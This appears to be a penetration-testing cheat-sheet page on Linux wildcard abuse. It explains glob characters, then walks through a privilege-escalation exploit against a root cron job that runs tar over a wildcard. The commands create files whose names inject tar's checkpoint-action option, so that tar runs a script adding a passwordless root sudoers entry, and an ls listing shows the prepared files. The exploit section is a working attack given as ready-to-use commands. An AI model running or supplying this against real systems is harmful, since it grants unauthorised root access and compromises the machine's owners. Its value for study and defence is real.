Wildcard Abuse

Character

Significance

*

An asterisk that can match any number of characters in a file name.

?

Matches a single character.

[ ]

Brackets enclose characters and can match any single one at the defined position.

~

A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.

-

A hyphen within brackets will denote a range of characters.

Sample Exploitation

  1. Assuming that there is a cron

    #
#
mh dom mon dow command
*/01 * * * * cd /root && tar -zcf /tmp/backup.tar.gz *

  2. Use this command (similar to the one in gtfobin)

    $ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
$ echo "" > "--checkpoint-action=exec=sh root.sh"
$ echo "" > --checkpoint=1
$ ls -la

total 56
drwxrwxrwt 10 root        root        4096 Aug 31 23:12 .
drwxr-xr-x 24 root        root        4096 Aug 31 02:24 ..
-rw-r--r--  1 root        root         378 Aug 31 23:12 backup.tar.gz
-rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint=1
-rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .font-unix
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .ICE-unix
-rw-rw-r--  1 cliff.moore cliff.moore   60 Aug 31 23:11 root.sh

  3. Once the cronjob runs, we will gain root

PreviousPath AbuseNextEscaping Restricted Shells

Last updated